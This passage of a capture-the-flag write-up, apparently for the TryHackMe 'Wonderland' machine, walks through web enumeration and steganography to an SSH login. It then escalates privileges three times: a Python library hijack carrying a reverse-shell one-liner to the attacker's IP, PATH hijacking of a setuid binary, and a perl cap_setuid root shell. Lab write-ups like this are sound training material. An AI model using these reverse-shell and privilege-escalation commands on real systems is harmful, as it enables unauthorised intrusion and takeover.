"Curiouser and curiouser!" cried Alice (she was so much surprised, that for the moment she quite forgot how to speak good English)
```
The only new folder is the /img one and I'll take a look in a bit.
I run a gobuster in order to check if there are some other pages hidden/not linked (for pages and directories)
```bash
gobuster dir -u http://10.10.40.248 -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.40.248
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2022/01/18 04:50:26 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.40.248/img (Status: 301) [Size: 0] [--> img/]
http://10.10.40.248/index.html (Status: 301) [Size: 0] [--> ./]
http://10.10.40.248/r (Status: 301) [Size: 0] [--> r/]
gobuster dir -u http://10.10.40.248 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.40.248
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/18 04:51:51 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 0] [--> img/]
/r (Status: 301) [Size: 0] [--> r/]
/poem (Status: 301) [Size: 0] [--> poem/]
```
and I notice there is a /r page, I browse to it
Nice...but still nothing, just an html page without any other clue. The /poem page is the same, just a "non-sense" poem :)
I run another gobuster for the directories, this time I use the http://10.10.40.248/r as starting point...and voila! It appears there is a /a following the /r page
Wait wait...what is following Alice? The white rabbit.
I've a clue: /r/a/, 99% sure the following pages will be /r/a/b/b/i/t
and there it is! Still an normal page without any link, I run a cURL and
```bash
curl -L -i http://10.10.40.248/r/a/b/b/i/t
HTTP/1.1 301 Moved Permanently
Location: t/
Date: Tue, 18 Jan 2022 10:07:42 GMT
Content-Length: 0
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 782
Content-Type: text/html; charset=utf-8
Last-Modified: Mon, 01 Jun 2020 22:41:05 GMT
Date: Tue, 18 Jan 2022 10:07:42 GMT
"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."
Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving the other paw, "lives a March Hare. Visit either you like: they’re both mad."
```
...finally I've the user and pass to access as alice!
Another clue - found it later - was present on the image *white_rabbit_1.jpg*
If I download the image present on the home page and I analyze it with steghide I found a clue:
```bash
steghide extract -sf Downloads/white_rabbit_1.jpg
Enter passphrase:
wrote extracted data to "hint.txt".
cat hint.txt
follow the r a b b i t
```
yes...I'll follow the /r/a/b/b/i/t :)
## Initial foothold (as alice)
I connect to the machine via SSH using alice and the password found:
```bash
ssh alice@10.10.40.248
...
alice@wonderland:~$
```
First of all I check what is present on my home directory
```bash
alice@wonderland:~$ ls -ltra
total 44
-rw-r--r-- 1 alice alice 807 May 25 2020 .profile
-rw-r--r-- 1 alice alice 220 May 25 2020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25 2020 .bashrc
-rw-r--r-- 1 root root 3577 May 25 2020 walrus_and_the_carpenter.py
drwxrwxr-x 3 alice alice 4096 May 25 2020 .local
drwx------ 3 alice alice 4096 May 25 2020 .gnupg
drwx------ 2 alice alice 4096 May 25 2020 .cache
-rw------- 1 root root 66 May 25 2020 root.txt
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
drwxr-xr-x 6 root root 4096 May 25 2020 ..
-rw------- 1 alice alice 7 Jan 18 10:14 .python_history
drwxr-xr-x 5 alice alice 4096 Jan 18 10:14 .
```
The file root.txt will contains the root flag...for sure (and I can't read it now) and the python script seems really interesting.
Now the tricky part: the hint on the room is *Everything is upside down here.*...well...if the root.txt is into alice's homedir it means the user.txt is into the root's homedir
```bash
alice@wonderland:~$ cat /root/user.txt
THM{......}
```
## PrivEsc 1 (rabbit)
I run some classic commands in order to understand what I can and I can't do
```bash
alice@wonderland:~$ sudo -l
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
alice@wonderland:~$ cat /etc/sudoers.d/alice
alice ALL = (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
alice@wonderland:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/sudo
/bin/fusermount
/bin/umount
/bin/ping
/bin/mount
/bin/su
alice@wonderland:~$ find / -type f -perm -04000 -ls 2>/dev/null
394282 44 -rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
394475 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
394471 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
524949 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
394289 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
393716 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
393920 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
394097 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
393714 76 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
393936 60 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
393809 76 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
393919 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
393663 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
393918 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
393956 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
394061 148 -rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
655427 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
655971 28 -rwsr-xr-x 1 root root 26696 Mar 5 2020 /bin/umount
655478 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
655970 44 -rwsr-xr-x 1 root root 43088 Mar 5 2020 /bin/mount
655494 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
alice@wonderland:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
tryhackme:x:1000:1000:tryhackme:/home/tryhackme:/bin/bash
alice:x:1001:1001:Alice Liddell,,,:/home/alice:/bin/bash
hatter:x:1003:1003:Mad Hatter,,,:/home/hatter:/bin/bash
rabbit:x:1002:1002:White Rabbit,,,:/home/rabbit:/bin/bash
```
Ok, it seems I can run the python script as the user rabbit (and gain access as rabbit), let's read it:
```python
alice@wonderland:~$ cat walrus_and_the_carpenter.py
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.
...cut...
for i in range(10):
line = random.choice(poem.split("\n"))
print("The line was:\t", line)
```
The script is just importing a library (random) and is calling a method of this library (choice)...and printing some random string included on the script.
After a small research I found a good website with a well explanation of Python Library Hijacking:
https://www.hackingarticles.in/linux-privilege-escalation-python-library-hijacking/
According to the article at Method 2
*This vulnerability is based on the priority order of the Python Library path that is applied to the Module file that our script is importing. When a module is imported in a script, the Python will look for the particular module file inside the default directories in particular priority order. In the python script that we created; we have the webbrowser.py module file that is called. The module that is being searched will be located in one of the default paths. Although if there exists a python module file in the same directory as the original script, it will get priority over the default paths.*
What I have to do is creating a python file (or just copy the real random library) into the alice's home dir, modify it with a reverse shell for example and run the script with sudo as rabbit.
Some other player just created a new script with a reverse shell or executed just a bash...my method is a little bit different and the same of the example present on the website: copy the random.py library, modify the choice method, open a new netcat listener on port 4444 and run the script (yes..more "difficult")
```bash
alice@wonderland:~$ cp /usr/lib/python3.6/random.py .
alice@wonderland:~$ pwd
/home/alice
alice@wonderland:~$ vi random.py
## -------------------- sequence methods -------------------
def choice(self, seq):
"""Choose a random element from a non-empty sequence."""
try:
#### the new line is this one:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.55.171",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
####
i = self._randbelow(len(seq))
except ValueError:
raise IndexError('Cannot choose from an empty sequence') from None
return seq[i]
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
```
and in the new listener the shell appears
```bash
nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.11.55.171] from (UNKNOWN) [10.10.188.29] 47908
$ id
uid=1002(rabbit) gid=1002(rabbit) groups=1002(rabbit)
$
```
Good! I'm rabbit now...next step is moving into root! Ops, no! there is the hatter user before root.
## PrivEsc 2 (hatter)
As usual, I run some classic commands in order to understand what I can and I can't do
```bash
rabbit@wonderland:/home/rabbit$ ls -ltra
ls -ltra
total 40
-rw-r--r-- 1 rabbit rabbit 807 May 25 2020 .profile
-rw-r--r-- 1 rabbit rabbit 3771 May 25 2020 .bashrc
-rw-r--r-- 1 rabbit rabbit 220 May 25 2020 .bash_logout
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rwsr-sr-x 1 root root 16816 May 25 2020 teaParty
drwxr-x--- 2 rabbit rabbit 4096 May 25 2020 .
rabbit@wonderland:/home/rabbit$ file teaParty
file teaParty
teaParty: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=75a832557e341d3f65157c22fafd6d6ed7413474, not stripped
rabbit@wonderland:/home/rabbit$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
1049052 20 -rwsr-sr-x 1 root root 16816 May 25 2020 /home/rabbit/teaParty
394282 44 -rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
394475 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
394471 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
524949 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
394289 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
393716 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
393920 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
394097 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
393714 76 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
393936 60 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
393809 76 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
393919 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
393663 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
393918 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
393956 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
394061 148 -rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
655427 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
655971 28 -rwsr-xr-x 1 root root 26696 Mar 5 2020 /bin/umount
655478 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
655970 44 -rwsr-xr-x 1 root root 43088 Mar 5 2020 /bin/mount
655494 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
```
the most interesting file is the teaParty executable, nothing else is present and I focus on it.
The teaParty elf is nothing really important, if I run it I have just a seg fault
```bash
./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Tue, 18 Jan 2022 16:28:43 -0500
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
```
I download the file into my kali box with netcat and I check it:
```bash
objdump -s -j .rodata teaParty
teaParty: file format elf64-x86-64
Contents of section .rodata:
2000 01000200 00000000 57656c63 6f6d6520 ........Welcome
2010 746f2074 68652074 65612070 61727479 to the tea party
2020 210a5468 65204d61 64204861 74746572 !.The Mad Hatter
2030 2077696c 6c206265 20686572 6520736f will be here so
2040 6f6e2e00 00000000 2f62696e 2f656368 on....../bin/ech
2050 6f202d6e 20275072 6f626162 6c792062 o -n 'Probably b
2060 79202720 26262064 61746520 2d2d6461 y ' && date --da
2070 74653d27 6e657874 20686f75 7227202d te='next hour' -
2080 52000000 00000000 41736b20 76657279 R.......Ask very
2090 206e6963 656c792c 20616e64 20492077 nicely, and I w
20a0 696c6c20 67697665 20796f75 20736f6d ill give you som
20b0 65207465 61207768 696c6520 796f7520 e tea while you
20c0 77616974 20666f72 2068696d 00000000 wait for him....
20d0 5365676d 656e7461 74696f6e 20666175 Segmentation fau
20e0 6c742028 636f7265 2064756d 70656429 lt (core dumped)
20f0 00
strings teaParty
/lib64/ld-linux-x86-64.so.2
2U~4
libc.so.6
setuid
puts
getchar
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
teaParty.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
getchar@@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
```
The only interesting part is */bin/echo -n 'Probably by ' && date --date='next hour' -R* and - checking it better - the date command is without the full/absolute path.
It means I can change the $PATH variable, add eg. the /tmp at the beginning of it and I can create a fake date command into /tmp who can spawn a shell. And - hopefully - being the hatter user
```bash
rabbit@wonderland:/$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
rabbit@wonderland:/tmp$ echo '#!/bin/bash' > /tmp/date
rabbit@wonderland:/tmp$ echo '/bin/bash' >> /tmp/date
rabbit@wonderland:/tmp$ cat /tmp/date
#!/bin/bash
/bin/bash
rabbit@wonderland:/home/rabbit$ chmod +x /tmp/date
rabbit@wonderland:/home/rabbit$ ./teaParty
./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ id
id
uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)
hatter@wonderland:/home/rabbit$
```
And boom! I'm the user hatter, let's check the home dir
```bash
hatter@wonderland:/home/rabbit$ cd ../hatter
hatter@wonderland:/home/hatter$ ls
password.txt
hatter@wonderland:/home/hatter$ cat password.txt
THISISTHEHATTERPASS
```
The password of the user hatter is present into the file! Good, let's check via SSH
```bash
ssh hatter@10.10.188.29
hatter@10.10.188.29's password:
....
hatter@wonderland:~$
```
Good! Now it's time to move to root
## Final PrivEsc to root
As usual, I run some classic commands in order to understand what I can and I can't do.
This time seems nothing is usable for moving to root but I forgot to check the cap_setuid
```bash
hatter@wonderland:/home/rabbit$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
```
I checked it before but it was not usable with the previous users but this time - if I remember well - it is:
```bash
ls -ltra /usr/bin/perl5.26.1
-rwxr-xr-- 2 root hatter 2097720 Nov 19 2018 /usr/bin/perl5.26.1
ls -ltr /usr/bin/perl
-rwxr-xr-- 2 root hatter 2097720 Nov 19 2018 /usr/bin/perl
```
To better undestand what the cap_setuid is check https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities
According to https://gtfobins.github.io/gtfobins/perl/#capabilities is pretty simple
```bash
hatter@wonderland:/$ /usr/bin/perl5.26.1 -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# id
uid=0(root) gid=1003(hatter) groups=1003(hatter)
# whoami
root
# cd /home/alice
# cat root.txt
thm{thefinalflag}
```
and...machine owned!